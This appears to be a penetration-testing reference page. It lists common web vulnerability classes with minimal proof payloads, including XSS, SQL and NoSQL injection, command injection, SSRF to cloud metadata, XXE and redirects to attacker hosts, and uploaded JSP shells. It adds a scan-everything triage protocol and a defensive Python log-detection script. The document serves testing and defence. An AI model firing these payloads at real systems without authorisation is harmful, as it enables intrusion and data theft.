Common Web Vulnerabilities.

The canonical vulnerability catalog: every class with at least one concrete proof-pattern. The single most-cited entry in the index.

Minimum proof-pattern per class

  • Reflected XSS. ?q=<svg/onload=alert(1)> reflected unencoded in HTML context. Confirms HTML injection without breaking the page.
  • Stored XSS. Same payload submitted via form, retrieved on second page-load by a different user. Source ≠ sink is the proof.
  • SQL injection. id=1' AND SLEEP(5)-- with 5-second response delay. Time-based confirms without leaking data.
  • NoSQL injection. JSON body with {"user":"admin","pass":{"$ne":""}} → authenticated as admin. Mongo's most common foot-gun.
  • Command injection. ?host=127.0.0.1;sleep%205 on a ping endpoint, response delayed 5s. Always start with time-based, never with data exfil.
  • SSRF. ?url=http://169.254.169.254/latest/meta-data/ returns instance metadata. Cloud-specific proof, less ambiguous than internal-network reach.
  • Untrusted deserialization (Java). ysoserial CommonsCollections5 payload → DNS callback to attacker domain. Proves code execution without writing files.
  • XXE. <!ENTITY xxe SYSTEM "http://attacker/p"> in XML body → HTTP callback received. Out-of-band variant proves the parser fetched.
  • File upload to RCE. Upload shell.jsp.png, request /uploads/shell.jsp.png → executes as JSP because of double-extension or MIME mishandling.
  • IDOR. User A creates resource /api/orders/1234, User B requests same URL → 200 OK with A's data. Two test accounts are mandatory for the proof.
  • CSRF. Action endpoint accepts POST without anti-CSRF token. Submit form from attacker-origin HTML, action executes.
  • Open redirect. ?next=//evil.com issues a 302 to attacker host. Useful as a chain element, weak finding standalone.
  • Subdomain takeover. DNS CNAME points to a SaaS host that doesn't claim the record. Register the resource on the SaaS → serve attacker content under target domain.

Triage protocol when scope is huge and intel is zero

  1. Run the catalog top-to-bottom against any reachable surface. One probe per class, minute-long timeouts, log everything.
  2. Anything that comes back with a non-baseline response → flag for manual follow-up. Don't deep-dive in the first pass.
  3. After full sweep, sort flags by exploitability × impact. Take the top three; ignore the rest until those are exhausted.
  4. For each, build the full chain (proof → impact → remediation). Move on only when written up.

Rule of thumb: A proof-pattern that doesn't break the page is worth more than one that does. Time-based and out-of-band proofs survive WAFs, satisfy the client's reproducer, and don't trigger user-visible errors during testing.
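A defender-side counterpart to the triage protocol and the rule of thumb above, added here as an example and not part of the original page: it runs signatures for the catalog's probe patterns over a few constructed access-log lines and flags, for manual follow-up, the requests whose response latency corroborates a time-based probe. The log format, field order, the 4.5 s latency threshold and the regexes are all assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from any real system): method, path, status, latency in ms.
SAMPLE_LOG = """\
GET /search?q=%3Csvg%2Fonload%3Dalert(1)%3E 200 12
GET /item?id=1'%20AND%20SLEEP(5)--%20 200 5104
GET /ping?host=127.0.0.1;sleep%205 200 5011
GET /fetch?url=http://169.254.169.254/latest/meta-data/ 200 87
GET /login?next=//evil.example 302 4
GET /item?id=42 200 9
"""

# One signature per catalog class, matched against the URL-decoded request path (assumed regexes).
PROBE_PATTERNS = {
    "reflected-xss": re.compile(r"<\s*(svg|script|img)[^>]*on\w+\s*=", re.I),
    "sqli-time": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(", re.I),
    "cmdi-time": re.compile(r"[;|&`]\s*sleep\s+\d+", re.I),
    "ssrf-metadata": re.compile(r"169\.254\.169\.254"),
    "open-redirect": re.compile(r"[?&](next|url|redirect)=//", re.I),
}
TIME_BASED = {"sqli-time", "cmdi-time"}

LINE_RE = re.compile(r"^(\S+) (\S+) (\d{3}) (\d+)$")  # assumed log format
SLOW_MS = 4500  # assumed threshold: latency that corroborates a time-based probe

def classify(line):
    """Return (catalog_class, corroborated) for one log line, or None if it looks like baseline traffic."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    path, latency_ms = unquote(m.group(2)), int(m.group(4))
    for name, pattern in PROBE_PATTERNS.items():
        if pattern.search(path):
            # A time-based signature alone is a non-baseline response; a real stall corroborates it.
            corroborated = name not in TIME_BASED or latency_ms >= SLOW_MS
            return name, corroborated
    return None

def triage(log_text):
    """Flag every non-baseline line; corroborated hits sort first for manual follow-up."""
    flags = []
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            flags.append((hit[0], hit[1], line))
    flags.sort(key=lambda flag: (not flag[1], flag[0]))
    return flags
```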

From reference to evidence

Run this against your own environment.